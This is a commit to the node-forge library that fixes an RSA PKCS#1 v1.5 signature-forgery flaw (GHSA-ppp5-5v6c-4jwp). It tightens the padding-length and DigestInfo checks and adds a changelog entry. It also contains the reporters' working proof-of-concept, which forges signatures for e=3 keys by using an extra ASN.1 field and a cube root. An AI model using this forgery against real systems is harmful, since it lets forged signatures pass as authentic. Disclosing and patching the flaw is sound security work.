Add RSA padding and DigestInfo length checks.

- [rsa] Fix padding length check according to RFC 2313 8.1 note 6.
  Padding is required to be eight octets for block types 1 and 2.
- [rsa] Fix RFC 8017 DigestInfo parsing to require a sequence length of
  two.
- Address GHSA-ppp5-5v6c-4jwp:
  - GHSA-ppp5-5v6c-4jwp
- Add submitted PoC.
- Add tests with generated vectors.

Author: davidlehn

CHANGELOG.md

@@ -13,6 +13,20 @@ Forge ChangeLog
   - Reported by Kr0emer.
   - CVE ID: [CVE-2026-33891](https://www.cve.org/CVERecord?id=CVE-2026-33891)
   - GHSA ID: [GHSA-5gfm-wpxj-wjgq](https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx)
+- **HIGH**: Signature forgery in RSA-PKCS due to ASN.1 extra field.
+  - RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low
+    public exponent keys (e=3). Attackers can forge signatures by stuffing
+    "garbage" bytes within the ASN.1 structure in order to construct a
+    signature that passes verification, enabling Bleichenbacher style forgery.
+    This issue is similar to CVE-2022-24771, but adds bytes in an addition
+    field within the ASN.1 structure, rather than outside of it.
+  - Additionally, forge does not validate that signatures include a minimum of
+    8 bytes of padding as defined by the specification, providing attackers
+    additional space to construct Bleichenbacher forgeries.
+  - Reported as part of a U.C. Berkeley security research project by:
+    - Austin Chu, Sohee Kim, and Corban Villa.
+  - CVE ID: [CVE-2026-33894](https://www.cve.org/CVERecord?id=CVE-2026-33894)
+  - GHSA ID: [GHSA-ppp5-5v6c-4jwp](https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp)
 
 ### Changed
 - [jsbn] Update to `jsbn` 1.4. Sync partly back to original style for easier
@@ -24,6 +38,9 @@ Forge ChangeLog
   mathematically correct but aligns with current `jsbn` behavior returning zero
   in other situations. The alternate of a `RangeError` would diverge from the
   rest of the API.
+- [rsa] Fix padding length check according to RFC 2313 8.1 note 6. Padding is
+  required to be eight octets for block types 1 and 2.
+- [rsa] Fix RFC 8017 DigestInfo parsing to require a sequence length of two.
 
 ## 1.3.3 - 2025-12-02
 

lib/rsa.js

@@ -1133,6 +1133,9 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {
    *          _parseAllDigestBytes testing flag to control parsing of all
    *            digest bytes. Unsupported and not for general usage.
    *            (default: true)
+   *          _skipPaddingChecks testing flag to skip some padding checks to
+   *            test other checks. Unsupported and not for general usage.
+   *            (default: false)
    *
    * @return true if the signature was verified, false if not.
    */
@@ -1144,27 +1147,32 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {
     }
     if(options === undefined) {
       options = {
-        _parseAllDigestBytes: true
+        _parseAllDigestBytes: true,
+        _skipPaddingChecks: false
       };
     }
     if(!('_parseAllDigestBytes' in options)) {
       options._parseAllDigestBytes = true;
     }
+    if(!('_skipPaddingChecks' in options)) {
+      options._skipPaddingChecks = false;
+    }
 
     if(scheme === 'RSASSA-PKCS1-V1_5') {
       scheme = {
         verify: function(digest, d) {
           // remove padding
-          d = _decodePkcs1_v1_5(d, key, true);
+          d = _decodePkcs1_v1_5(d, key, true, undefined, options);
           // d is ASN.1 BER-encoded DigestInfo
           var obj = asn1.fromDer(d, {
             parseAllBytes: options._parseAllDigestBytes
           });
 
-          // validate DigestInfo
+          // validate DigestInfo structure and element count
           var capture = {};
           var errors = [];
-          if(!asn1.validate(obj, digestInfoValidator, capture, errors)) {
+          if(!asn1.validate(obj, digestInfoValidator, capture, errors) ||
+            obj.value.length !== 2) {
             var error = new Error(
               'ASN.1 object does not contain a valid RSASSA-PKCS1-v1_5 ' +
               'DigestInfo value.');
@@ -1208,7 +1216,7 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {
       scheme = {
         verify: function(digest, d) {
           // remove padding
-          d = _decodePkcs1_v1_5(d, key, true);
+          d = _decodePkcs1_v1_5(d, key, true, undefined, options);
           return digest === d;
         }
       };
@@ -1626,10 +1634,11 @@ function _encodePkcs1_v1_5(m, key, bt) {
  * @param key the RSA key to use.
  * @param pub true if the key is a public key, false if it is private.
  * @param ml the message length, if specified.
+ * @param options testing options.
  *
  * @return the decoded bytes.
  */
-function _decodePkcs1_v1_5(em, key, pub, ml) {
+function _decodePkcs1_v1_5(em, key, pub, ml, options) {
   // get the length of the modulus in bytes
   var k = Math.ceil(key.n.bitLength() / 8);
 
@@ -1649,7 +1658,7 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {
   var bt = eb.getByte();
   if(first !== 0x00 ||
     (pub && bt !== 0x00 && bt !== 0x01) ||
-    (!pub && bt != 0x02) ||
+    (!pub && bt !== 0x02) ||
     (pub && bt === 0x00 && typeof(ml) === 'undefined')) {
     throw new Error('Encryption block is invalid.');
   }
@@ -1673,6 +1682,11 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {
       }
       ++padNum;
     }
+
+    // RFC 2313 8.1 note 6
+    if(padNum < 8 && !(options ? options._skipPaddingChecks : false)) {
+      throw new Error('Encryption block is invalid.');
+    }
   } else if(bt === 0x02) {
     // look for 0x00 byte
     padNum = 0;
@@ -1683,6 +1697,11 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {
       }
       ++padNum;
     }
+
+    // RFC 2313 8.1 note 6
+    if(padNum < 8 && !(options ? options._skipPaddingChecks : false)) {
+      throw new Error('Encryption block is invalid.');
+    }
   }
 
   // zero must be 0x00 and padNum must be (k - 3 - message length)

tests/pocs/ghsa-ppp5-5v6c-4jwp.js

@@ -0,0 +1,166 @@
+#!/usr/bin/env node
+'use strict';
+
+// Security Advisory PoC
+//
+// https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp
+//
+// This vulnerability was discovered as part of a U.C. Berkeley security
+// research project by: Austin Chu, Sohee Kim, and Corban Villa.
+//
+// Test vectors from this code were added in the RSA unit tests.
+
+const crypto = require('crypto');
+const forge = require('../../lib/index');
+
+// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:
+// SEQUENCE {
+//   SEQUENCE { OID sha256, NULL },
+//   OCTET STRING <32-byte digest>
+// }
+// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20
+const DIGESTINFO_SHA256_PREFIX = Buffer.from(
+  '300d060960864801650304020105000420',
+  'hex'
+);
+
+const toBig = b => BigInt('0x' + (b.toString('hex') || '0'));
+function toBuf(n, len) {
+  let h = n.toString(16);
+  if (h.length % 2) h = '0' + h;
+  const b = Buffer.from(h, 'hex');
+  return b.length < len ? Buffer.concat([Buffer.alloc(len - b.length), b]) : b;
+}
+function cbrtFloor(n) {
+  let lo = 0n;
+  let hi = 1n;
+  while (hi * hi * hi <= n) hi <<= 1n;
+  while (lo + 1n < hi) {
+    const mid = (lo + hi) >> 1n;
+    if (mid * mid * mid <= n) lo = mid;
+    else hi = mid;
+  }
+  return lo;
+}
+const cbrtCeil = n => {
+  const f = cbrtFloor(n);
+  return f * f * f === n ? f : f + 1n;
+};
+function derLen(len) {
+  if (len < 0x80) return Buffer.from([len]);
+  if (len <= 0xff) return Buffer.from([0x81, len]);
+  return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);
+}
+
+function forgeStrictVerify(publicPem, msg, sig) {
+  // Enable for debugging and test vector generation.
+  //console.log({
+  //  publicPem,
+  //  msg, msg.toString('hex'),
+  //  sig: sig.toString('hex')
+  //});
+
+  const key = forge.pki.publicKeyFromPem(publicPem);
+  const md = forge.md.sha256.create();
+  md.update(msg.toString('utf8'), 'utf8');
+  try {
+    // verify(digestBytes, signatureBytes, scheme, options):
+    // - digestBytes: raw SHA-256 digest bytes for `msg`
+    // - signatureBytes: binary-string representation of the candidate signature
+    // - scheme: undefined => default RSASSA-PKCS1-v1_5
+    // - options._parseAllDigestBytes: require DER parser to consume all bytes
+    //   (this is forge's default for verify; set explicitly here for clarity)
+    return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };
+  } catch (err) {
+    return { ok: false, err: err.message };
+  }
+}
+
+function main() {
+  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {
+    modulusLength: 4096,
+    publicExponent: 3,
+    privateKeyEncoding: { type: 'pkcs1', format: 'pem' },
+    publicKeyEncoding: { type: 'pkcs1', format: 'pem' }
+  });
+
+  const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });
+  const nBytes = Buffer.from(jwk.n, 'base64url');
+  const n = toBig(nBytes);
+  const e = toBig(Buffer.from(jwk.e, 'base64url'));
+  if (e !== 3n) throw new Error('expected e=3');
+
+  const msg = Buffer.from('forged-message-0', 'utf8');
+  const digest = crypto.createHash('sha256').update(msg).digest();
+  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);
+
+  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.
+  const k = nBytes.length;
+  // ffCount can be set to any value at or below 111 and produce a valid signature.
+  // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.
+  // However, current versions of node forge do not check for this.
+  // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.
+  const ffCount = 0;
+  // `garbageLen` affects DER length field sizes, which in turn affect how
+  // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.
+  // A small cap (8) is enough here: DER length-size transitions are discrete
+  // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.
+  let garbageLen = 0;
+  for (let i = 0; i < 8; i += 1) {
+    const gLenEnc = derLen(garbageLen).length;
+    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;
+    const seqLenEnc = derLen(seqLen).length;
+    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;
+    const next = k - fixed;
+    if (next === garbageLen) break;
+    garbageLen = next;
+  }
+  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;
+  const prefix = Buffer.concat([
+    Buffer.from([0x00, 0x01]),
+    Buffer.alloc(ffCount, 0xff),
+    Buffer.from([0x00]),
+    Buffer.from([0x30]), derLen(seqLen),
+    algAndDigest,
+    Buffer.from([0x04]), derLen(garbageLen)
+  ]);
+
+  // Build the numeric interval of all EM values that start with `prefix`:
+  // - `low`  = prefix || 00..00
+  // - `high` = one past (prefix || ff..ff)
+  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.
+  const suffixLen = k - prefix.length;
+  const low = toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));
+  const high = low + (1n << BigInt(8 * suffixLen));
+  const s = cbrtCeil(low);
+  if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');
+
+  const sig = toBuf(s, k);
+
+  const controlMsg = Buffer.from('control-message', 'utf8');
+  const controlSig = crypto.sign('sha256', controlMsg, {
+    key: privateKey,
+    padding: crypto.constants.RSA_PKCS1_PADDING
+  });
+
+  // forge verification calls (library under test)
+  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);
+  const forgedForge = forgeStrictVerify(publicKey, msg, sig);
+
+  // Node.js verification calls (OpenSSL-backed reference behavior)
+  const controlNode = crypto.verify('sha256', controlMsg, {
+    key: publicKey,
+    padding: crypto.constants.RSA_PKCS1_PADDING
+  }, controlSig);
+  const forgedNode = crypto.verify('sha256', msg, {
+    key: publicKey,
+    padding: crypto.constants.RSA_PKCS1_PADDING
+  }, sig);
+
+  console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');
+  console.log('control-node:', controlNode);
+  console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');
+  console.log('forgery (node/OpenSSL):', forgedNode);
+}
+
+main();